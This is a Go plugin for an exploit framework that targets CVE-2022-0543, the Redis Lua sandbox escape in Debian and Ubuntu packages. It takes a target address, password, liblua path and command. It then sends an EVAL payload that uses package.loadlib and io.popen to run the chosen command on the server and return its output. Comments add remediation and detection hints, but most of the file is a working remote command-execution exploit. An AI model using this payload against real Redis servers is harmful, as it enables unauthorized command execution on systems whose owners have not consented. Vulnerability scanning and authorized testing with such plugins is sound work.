CVE-2022-0543
package CVE_2022_0543
import (
"context"
"expgo/plugins/api/req"
"expgo/plugins/api/types"
"fmt"
"log"
"net"
"strconv"
"time"
)
// Plugin metadata. Nothing in this file reads these variables; presumably the
// plugin loader picks them up by name (confirm against the loader).
var (
	name       = "CVE-2022-0543"
	component  = "redis"
	vulType    = "rce"
	pluginType = "custom"
	author     = "akkuman"
)

// description, in English: Redis Lua sandbox bypass leading to command
// execution (CVE-2022-0543). The Debian and Ubuntu packages of Redis
// accidentally left the `package` object reachable inside the Lua sandbox; an
// attacker can use the methods it provides to load functions from the liblua
// shared library, escape the sandbox and run arbitrary commands.
//
// The issue comes from distribution packaging, so remediation is the
// distribution's security update for the redis package. Requiring
// authentication and keeping the Redis port off untrusted networks limits who
// can send EVAL at all.
var description = "Redis Lua沙盒绕过命令执行(CVE-2022-0543)Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。"

// references and tags are free-form lookup aids for the plugin catalogue.
var (
	references = []string{"https://github.com/vulhub/vulhub/blob/master/redis/CVE-2022-0543/README.zh-cn.md"}
	tags       = []string{"redis", "rce"}
)
// opts is the plugin's option set; the individual options (target, password,
// liblua_path, cmd) are registered on it in init.
var opts = types.NewOptions()
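// init registers the options this plugin accepts.
//
// The arguments to opts.String appear to be (name, required, help text,
// default value, optional validator); that reading is inferred from the calls
// below and should be confirmed against the types package.
func init() {
	// target: host:port of the Redis instance. The validator rejects values
	// that are not strings instead of panicking on the type assertion, then
	// checks the address with net.ResolveTCPAddr. For a host name that call
	// performs a DNS lookup, so validation itself can generate network traffic.
	opts.String("target", true, "目标", "", func(i interface{}) bool {
		target, ok := i.(string)
		if !ok {
			return false
		}
		_, err := net.ResolveTCPAddr("tcp", target)
		return err == nil
	})
	// password: Redis password; the help text says an empty value means the
	// server requires no authentication.
	opts.String("password", false, "redis密码(无密码代表无验证)", "")
	// liblua_path: path of the liblua shared object on the target host. The
	// default is the x86_64 multiarch library directory; other architectures
	// or layouts need a different value.
	opts.String("liblua_path", false, "liblua路径", "/usr/lib/x86_64-linux-gnu/liblua5.1.so.0")
	// cmd: command whose output is returned as evidence. The default "id" only
	// reads the identity of the Redis process.
	opts.String("cmd", true, "执行命令", "id")
}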
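// exploit checks the Redis instance named by params["target"] for
// CVE-2022-0543 by sending a single EVAL script and classifying the reply.
//
// The script depends on the `package` global being reachable inside the Lua
// sandbox: it calls package.loadlib on liblua_path to obtain the io library
// and reads the output of cmd through io.popen. On a build where `package` is
// not reachable the script is expected to fail, which ends in the miss branch.
//
// Result mapping:
//   - a required parameter is missing or not a string: types.MissPluginResult
//   - the 10 second request context has expired or was cancelled:
//     types.HitPluginResult
//   - any other error from EVAL: types.MissPluginResult
//   - otherwise: Success, with the script's return value in ExtendInfo["data"]
//
// For defenders: an EVAL body that references package.loadlib or io.popen is
// not something ordinary application scripts contain, so those strings are
// usable detection content for Redis command logging or network inspection.
func exploit(ctx context.Context, params map[string]interface{}) types.PluginResult {
	// Use comma-ok assertions: a missing key or a non-string value used to
	// panic here and take the whole plugin host down with it.
	target, okTarget := params["target"].(string)
	libluaPath, okLib := params["liblua_path"].(string)
	cmd, okCmd := params["cmd"].(string)
	if !okTarget || !okLib || !okCmd {
		log.Println("missing or non-string target, liblua_path or cmd parameter")
		return types.MissPluginResult
	}
	// password is optional; an absent value falls back to the empty string.
	password, _ := params["password"].(string)

	rc := req.NewRedisClient(target, password, 0)
	defer rc.Close()

	// Bound the request so a server that never answers cannot block the caller.
	reqCtx, cancel := context.WithTimeout(ctx, 10*time.Second)
	defer cancel()

	// strconv.Quote embeds both operator-supplied values as quoted string
	// literals, so neither can terminate the string argument it sits in.
	payload := fmt.Sprintf(`local io_l = package.loadlib(%s, "luaopen_io"); local io = io_l(); local f = io.popen(%s, "r"); local res = f:read("*a"); f:close(); return res`, strconv.Quote(libluaPath), strconv.Quote(cmd))
	resp := rc.Eval(reqCtx, payload, nil)
	result, err := resp.Result()

	// NOTE(review): reqCtx.Err() is also non-nil when the parent ctx was
	// cancelled or the host did not answer within the timeout, so this branch
	// can report a hit with no evidence from the server. Treat such results
	// as unconfirmed until re-tested.
	if reqCtx.Err() != nil {
		log.Println("redis主线程可能已经被占用或命令已经执行成功")
		return types.HitPluginResult
	}
	if err != nil {
		log.Println(err)
		return types.MissPluginResult
	}

	// The command output is written to the process log as well as returned;
	// it may hold data from the tested host, so handle the log accordingly.
	log.Printf("命令执行结果: %v\n", result)
	return types.PluginResult{
		ExtendInfo: map[string]interface{}{
			"data": result,
		},
		Success: true,
	}
}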